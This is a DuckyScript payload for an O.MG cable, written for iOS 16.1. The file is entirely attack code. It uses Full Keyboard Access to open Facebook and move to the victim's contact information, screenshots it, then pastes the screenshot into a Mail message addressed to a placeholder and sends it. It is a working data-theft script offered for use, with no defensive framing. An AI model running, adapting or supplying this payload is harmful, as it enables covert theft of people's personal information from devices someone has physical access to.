EM Version 1.0
REM OS: iOS
REM Author: Peaakss
REM Description: This payload goes to facebook contact info and takes a screen shot and copy's it into a email to be sent 
REM NOTICE change text inside strings with "" to desried text | EXAMPLE | STRING 111-111-111
REM NOITCE Payload was made on iOS 16.1 - iPhone| Timing may have have to be changed based on version/model
REM NOTICE Lighting to USB-A or USB-C camera adapter is needed to run this payload, ative end of the O.MG cable must be plugged into the end of the converter
REM NOTICE This payload requires the iOS device to be Full Keyboard Access mode | THIS IS A VERY EXPERIMENTAL PAYLOADS AND IS VERY DEPENDENT ON ENVIORMENT 

GUI h
DELAY 150
GUI h
DELAY 150
GUI SPACE
DELAY 250
STRING Facebook
DELAY 300
ENTER
DELAY 250
DOWN ARROW
DELAY 500
DOWN ARROW
DELAY 500
DOWN ARROW 
DELAY 500
DOWN ARROW 
DELAY 500
DOWN ARROW 
DELAY 500
RIGHT ARROW
DELAY 500
RIGHT ARROW 
DELAY 500
RIGHT ARROW 
DELAY 500
SPACE
DELAY 500
DOWN ARROW
DELAY 500
DOWN ARROW
DELAY 500
SPACE
DELAY 250
DOWN ARROW
DELAY 250
SPACE 
DELAY 250
DOWN ARROW 
DELAY 250
SPACE
DELAY 250
DOWN ARROW
DELAY 150
DOWN ARROW
DELAY 150
SPACE
DELAY 250
GUI SHIFT 4
DELAY 250
SPACE
DELAY 150
DELAY 150
DOWN ARROW
DELAY 150
DOWN ARROW
DELAY 150
DOWN ARROW
DELAY 150
DOWN ARROW
DELAY 250
SPACE
GUI h
DELAY 150
GUI SPACE
DELAY 250
BACKSPACE
DELAY 250
STRING Mail
DELAY 250
ENTER
DELAY 500
GUI n
DELAY 500
STRING "EMAIL"
DELAY 150
TAB
DELAY 150
ENTER
DELAY 250
STRING "SUBJECT"
DELAY 150
ENTER
DELAY 150
GUI v 
DELAY 250
GUI SHIFT d
DELAY 150
ENTER
GUI h
